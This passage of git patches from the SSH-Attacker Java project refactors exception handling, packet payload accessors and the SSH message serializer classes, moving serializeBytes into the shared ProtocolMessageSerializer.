files changed, 8 insertions(+), 20 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/EndOfStreamException.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/EndOfStreamException.java index 91fae4347..855c1e2e3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/EndOfStreamException.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/exceptions/EndOfStreamException.java @@ -7,27 +7,13 @@ */ package de.rub.nds.sshattacker.core.exceptions; -public class EndOfStreamException extends RuntimeException { +import java.io.EOFException; + +public class EndOfStreamException extends EOFException { public EndOfStreamException() {} public EndOfStreamException(String message) { super(message); } - - public EndOfStreamException(String message, Throwable cause) { - super(message, cause); - } - - public EndOfStreamException(Throwable cause) { - super(cause); - } - - public EndOfStreamException( - String message, - Throwable cause, - boolean enableSuppression, - boolean writableStackTrace) { - super(message, cause, enableSuppression, writableStackTrace); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index 3610d4605..f44750ecd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -224,6 +224,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException } } else { + if (nextInputStream == null) { // only set new input stream if necessary, extend current stream otherwise nextInputStream = new HintedLayerInputStream(currentHint, this); @@ -244,6 +245,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException 0, packet.getCleanProtocolMessageBytes().getValue().length)); } + throw new RuntimeException(); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index f388c1637..ae4f759c4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -167,8 +167,6 @@ public LayerProcessingResult receiveData() { } while (shouldContinueProcessing()); } catch (TimeoutException ex) { LOGGER.debug(ex); - } catch (EndOfStreamException ex) { - LOGGER.debug("Reached end of stream, cannot parse more messages", ex); } return getLayerResult(); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestMessage.java index 431051564..595f99464 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestMessage.java @@ -88,5 +88,7 @@ public void setWantReply(boolean wantReply) { } @Override - public String toShortString(){return "CHANNEL_REQUEST";} + public String toShortString() { + return "CHANNEL_REQUEST"; + } } From 9b0c0e16e4dfe0a7cc93cae58696a81f36196b56 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 12 Aug 2023 01:27:12 +0200 Subject: [PATCH 058/176] REV: move "serializeBytes" from messageSerializer-classes back to the ProtocolMessageSerializer-Class --- .../core/layer/hints/LayerProcessingHint.java | 6 +--- .../core/layer/hints/PacketLayerHint.java | 1 - .../core/layer/impl/PacketLayer.java | 36 ++++++++----------- .../core/packet/AbstractPacket.java | 17 +++------ .../core/packet/cipher/PacketMacedCipher.java | 4 +-- .../UserAuthBannerMessageSerializer.java | 5 --- .../UserAuthFailureMessageSerializer.java | 5 --- .../UserAuthInfoRequestMessageSerializer.java | 5 --- ...UserAuthInfoResponseMessageSerializer.java | 5 --- .../UserAuthRequestMessageSerializer.java | 5 --- .../UserAuthSuccessMessageSerializer.java | 5 --- .../common/ProtocolMessageSerializer.java | 6 ++-- .../serializer/ChannelMessageSerializer.java | 6 ---- .../ChannelOpenMessageSerializer.java | 5 --- ...GlobalRequestFailureMessageSerializer.java | 5 --- .../GlobalRequestMessageSerializer.java | 5 --- ...GlobalRequestSuccessMessageSerializer.java | 5 --- .../serializer/AsciiMessageSerializer.java | 5 --- .../serializer/DebugMessageSerializer.java | 5 --- ...hGexKeyExchangeGroupMessageSerializer.java | 5 --- ...DhGexKeyExchangeInitMessageSerializer.java | 6 ---- ...eyExchangeOldRequestMessageSerializer.java | 6 ---- ...hGexKeyExchangeReplyMessageSerializer.java | 4 +-- ...exKeyExchangeRequestMessageSerializer.java | 5 --- .../DhKeyExchangeInitMessageSerializer.java | 5 --- .../DhKeyExchangeReplyMessageSerializer.java | 5 --- .../DisconnectMessageSerializer.java | 5 --- .../EcdhKeyExchangeInitMessageSerializer.java | 5 --- ...EcdhKeyExchangeReplyMessageSerializer.java | 5 --- ...ybridKeyExchangeInitMessageSerializer.java | 5 --- ...bridKeyExchangeReplyMessageSerializer.java | 6 ---- .../serializer/IgnoreMessageSerializer.java | 5 --- .../KeyExchangeInitMessageSerializer.java | 6 ---- .../serializer/NewKeysMessageSerializer.java | 6 ---- .../RsaKeyExchangeDoneMessageSerializer.java | 5 --- ...RsaKeyExchangePubkeyMessageSerializer.java | 5 --- ...RsaKeyExchangeSecretMessageSerializer.java | 6 ---- .../ServiceAcceptMessageSerializer.java | 6 ---- .../ServiceRequestMessageSerializer.java | 5 --- .../UnimplementedMessageSerializer.java | 5 --- .../serializer/UnknownMessageSerializer.java | 5 --- .../VersionExchangeMessageSerializer.java | 5 --- 42 files changed, 28 insertions(+), 229 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java index bca4c8c59..5f97211ea 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java @@ -11,8 +11,4 @@ * Lower layers sometimes need a hint for which data they need to receive. This a * LayerProcessingHint carries the necessary information. */ -public interface LayerProcessingHint { - - @Override - public boolean equals(Object o); -} +public interface LayerProcessingHint {} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java index 05c233bac..08775b8fa 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java @@ -30,7 +30,6 @@ public PacketLayerHint(MessageIdConstant type, int epoch, int sequenceNumber) { this.sequenceNumber = sequenceNumber; } - @Override public boolean equals(Object other) { if (other instanceof PacketLayerHint) { PacketLayerHint otherHint = (PacketLayerHint) other; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index f44750ecd..bd6dc55f0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -190,7 +190,7 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException "[bro] Decompressed Payload: {}", ArrayConverter.bytesToHexString(packet.getPayload())); - packet.setCleanProtocolMessageBytes(packet.getPayload()); + packet.setPayload(packet.getPayload()); addProducedContainer(packet); PacketLayerHint currentHint; @@ -209,18 +209,18 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException } // currentInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); // if only one byte is to transmit - transmit it alone - if (packet.getCleanProtocolMessageBytes().getValue().length == 1) { + if (packet.getPayload().getValue().length == 1) { currentInputStream.extendStream( Arrays.copyOfRange( - packet.getCleanProtocolMessageBytes().getValue(), + packet.getPayload().getValue(), 0, - packet.getCleanProtocolMessageBytes().getValue().length)); + packet.getPayload().getValue().length)); } else { currentInputStream.extendStream( Arrays.copyOfRange( - packet.getCleanProtocolMessageBytes().getValue(), + packet.getPayload().getValue(), 0, - packet.getCleanProtocolMessageBytes().getValue().length)); + packet.getPayload().getValue().length)); } } else { @@ -232,18 +232,18 @@ public void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException nextInputStream.setHint(currentHint); } // nextInputStream.extendStream(packet.getCleanProtocolMessageBytes().getValue()); - if (packet.getCleanProtocolMessageBytes().getValue().length == 1) { + if (packet.getPayload().getValue().length == 1) { nextInputStream.extendStream( Arrays.copyOfRange( - packet.getCleanProtocolMessageBytes().getValue(), + packet.getPayload().getValue(), 0, - packet.getCleanProtocolMessageBytes().getValue().length)); + packet.getPayload().getValue().length)); } else { nextInputStream.extendStream( Arrays.copyOfRange( - packet.getCleanProtocolMessageBytes().getValue(), + packet.getPayload().getValue(), 0, - packet.getCleanProtocolMessageBytes().getValue().length)); + packet.getPayload().getValue().length)); } throw new RuntimeException(); } @@ -276,15 +276,10 @@ public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) } MessageIdConstant id = - MessageIdConstant.fromId( - packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext()); - LOGGER.debug( - "[bro] Identifier: {} and constant {}", - packet.getCleanProtocolMessageBytes().getValue()[0], - id); + MessageIdConstant.fromId(packet.getPayload().getValue()[0], context.getContext()); + LOGGER.debug("[bro] Identifier: {} and constant {}", packet.getPayload().getValue()[0], id); - switch (MessageIdConstant.fromId( - packet.getCleanProtocolMessageBytes().getValue()[0], context.getContext())) { + switch (MessageIdConstant.fromId(packet.getPayload().getValue()[0], context.getContext())) { case SSH_MSG_DISCONNECT: LOGGER.debug("[bro] returning SSH_MSG_DISCONNECT Hint"); return new PacketLayerHint(MessageIdConstant.SSH_MSG_DISCONNECT); @@ -477,8 +472,7 @@ public PacketLayerHint parseMessageId(AbstractPacket packet, SshContext context) "[bro] cannot identifie {} as {} - returningn null", raw[1], MessageIdConstant.fromId( - packet.getCleanProtocolMessageBytes().getValue()[0], - context.getContext())); + packet.getPayload().getValue()[0], context.getContext())); return null; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java index 444274db0..34ec3553d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/AbstractPacket.java @@ -39,14 +39,6 @@ public abstract class AbstractPacket> @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE) private ModifiableByteArray payload; - public ModifiableByteArray getCleanProtocolMessageBytes() { - return cleanProtocolMessageBytes; - } - - public void setCleanProtocolMessageBytes(ModifiableByteArray cleanProtocolMessageBytes) { - this.cleanProtocolMessageBytes = cleanProtocolMessageBytes; - } - @ModifiableVariableProperty(type = ModifiableVariableProperty.Type.PLAIN_PROTOCOL_MESSAGE) private ModifiableByteArray cleanProtocolMessageBytes; @@ -91,17 +83,18 @@ public void setCompressedPayload(byte[] compressedPayload) { ModifiableVariableFactory.safelySetValue(this.compressedPayload, compressedPayload); } + public void setPayload(byte[] payload) { + this.payload = ModifiableVariableFactory.safelySetValue(this.payload, payload); + } + public ModifiableByteArray getPayload() { return payload; } public void setPayload(ModifiableByteArray payload) { + // this.cleanProtocolMessageBytes = cleanProtocolMessageBytes; this.payload = payload; } - public void setPayload(byte[] payload) { - this.payload = ModifiableVariableFactory.safelySetValue(this.payload, payload); - } - public abstract void prepareComputations(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java index 455baff13..33108333c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/packet/cipher/PacketMacedCipher.java @@ -326,7 +326,7 @@ private void decryptInner(AbstractPacket packet) throws CryptoException { computations.setPlainPacketBytes(plainData); ModifiableByteArray plain_modifialbel = new ModifiableByteArray(); plain_modifialbel.setOriginalValue(plainData); - packet.setCleanProtocolMessageBytes(plain_modifialbel); + packet.setPayload(plain_modifialbel); } else { if (encryptionAlgorithm.getIVSize() > 0) { // Case 3a: Blob packet / Cipher with IV @@ -338,7 +338,7 @@ private void decryptInner(AbstractPacket packet) throws CryptoException { packet.setCompressedPayload(plainData); ModifiableByteArray plain_modifialbel = new ModifiableByteArray(); plain_modifialbel.setOriginalValue(plainData); - packet.setCleanProtocolMessageBytes(plain_modifialbel); + packet.setPayload(plain_modifialbel); } // Set the IV for the next packet if the encryption algorithm incorporates one if (encryptionAlgorithm.getIVSize() > 0) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java index 790116dac..b135d2f81 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthBannerMessageSerializer.java @@ -45,9 +45,4 @@ public void serializeMessageSpecificContents() { serializeLanguageTag(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java index ad8d544cd..15b59a578 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthFailureMessageSerializer.java @@ -50,9 +50,4 @@ public void serializeMessageSpecificContents() { serializePartialSuccess(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java index cfe7656ed..9380940bc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoRequestMessageSerializer.java @@ -76,9 +76,4 @@ public void serializeMessageSpecificContents() { serializePrompt(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java index bb00335f4..51b8269a0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthInfoResponseMessageSerializer.java @@ -42,9 +42,4 @@ public void serializeMessageSpecificContents() { serializeResponse(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java index 1e41c211b..e885662cc 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthRequestMessageSerializer.java @@ -55,9 +55,4 @@ public void serializeMessageSpecificContents() { serializeMethodName(); } - @Override - public byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java index 28fc8be70..3f4a40e9a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/UserAuthSuccessMessageSerializer.java @@ -19,9 +19,4 @@ public UserAuthSuccessMessageSerializer(UserAuthSuccessMessage message) { @Override public void serializeMessageSpecificContents() {} - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java index 156d9a3e1..2b984e083 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/common/ProtocolMessageSerializer.java @@ -17,11 +17,11 @@ public ProtocolMessageSerializer(T message) { this.message = message; } - /* @Override + @Override protected final byte[] serializeBytes() { serializeProtocolMessageContents(); return getAlreadySerialized(); - }*/ + } - // protected abstract void serializeProtocolMessageContents(); + protected abstract void serializeProtocolMessageContents(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java index ce87c671f..7bdec7182 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelMessageSerializer.java @@ -30,10 +30,4 @@ private void serializeRecipientChannel() { public void serializeMessageSpecificContents() { serializeRecipientChannel(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java index 893dcbb1d..61c4f74d3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/ChannelOpenMessageSerializer.java @@ -54,9 +54,4 @@ public void serializeMessageSpecificContents() { serializePacketSize(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java index 34aada168..6736c50f8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestFailureMessageSerializer.java @@ -20,9 +20,4 @@ public GlobalRequestFailureMessageSerializer(GlobalRequestFailureMessage message @Override public void serializeMessageSpecificContents() {} - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java index fd8cd519c..5e815931c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestMessageSerializer.java @@ -46,9 +46,4 @@ public void serializeMessageSpecificContents() { serializeWantReply(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java index d5336d38b..e728e35ce 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/serializer/GlobalRequestSuccessMessageSerializer.java @@ -20,9 +20,4 @@ public GlobalRequestSuccessMessageSerializer(GlobalRequestSuccessMessage message @Override public void serializeMessageSpecificContents() {} - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/AsciiMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/AsciiMessageSerializer.java index f10bbfba7..ff95e87a3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/AsciiMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/AsciiMessageSerializer.java @@ -49,9 +49,4 @@ protected void serializeProtocolMessageContents() { serializeEndOfMessageSequence(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java index ccc9e95b1..9000009f7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DebugMessageSerializer.java @@ -55,9 +55,4 @@ public void serializeMessageSpecificContents() { serializeLanguageTag(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java index 3233a11e1..0dfa2033b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeGroupMessageSerializer.java @@ -52,9 +52,4 @@ public void serializeMessageSpecificContents() { serializeGroupGenerator(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java index 2deb2fef3..f1278ae3d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeInitMessageSerializer.java @@ -38,10 +38,4 @@ private void serializeEphemeralPublicKey() { public void serializeMessageSpecificContents() { serializeEphemeralPublicKey(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java index 182ba4e14..cd0ce9834 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeOldRequestMessageSerializer.java @@ -31,10 +31,4 @@ private void serializePreferredGroupSize() { public void serializeMessageSpecificContents() { serializePreferredGroupSize(); } - - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java index 181039ff0..15bc9e4a8 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeReplyMessageSerializer.java @@ -59,9 +59,9 @@ public void serializeMessageSpecificContents() { serializeSignature(); } - @Override + /* @Override protected byte[] serializeBytes() { serializeProtocolMessageContents(); return getAlreadySerialized(); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java index 0ae6185c0..0dd216c07 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhGexKeyExchangeRequestMessageSerializer.java @@ -44,9 +44,4 @@ public void serializeMessageSpecificContents() { serializeMaximalGroupSize(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java index 0f56e6573..b60a81e50 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeInitMessageSerializer.java @@ -39,9 +39,4 @@ public void serializeMessageSpecificContents() { serializeEphemeralPublicKey(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java index fbe4d18ba..e9e16f7e1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DhKeyExchangeReplyMessageSerializer.java @@ -59,9 +59,4 @@ public void serializeMessageSpecificContents() { serializeSignature(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java index fc3e80fc8..9a1f2b326 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/DisconnectMessageSerializer.java @@ -58,9 +58,4 @@ public void serializeMessageSpecificContents() { serializeLanguageTag(); } - @Override - protected byte[] serializeBytes() { - serializeProtocolMessageContents(); - return getAlreadySerialized(); - } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/serializer/EcdhKeyExchangeInitMessageSerializer.java index f37d5389d..5422d70c5 100644 --- 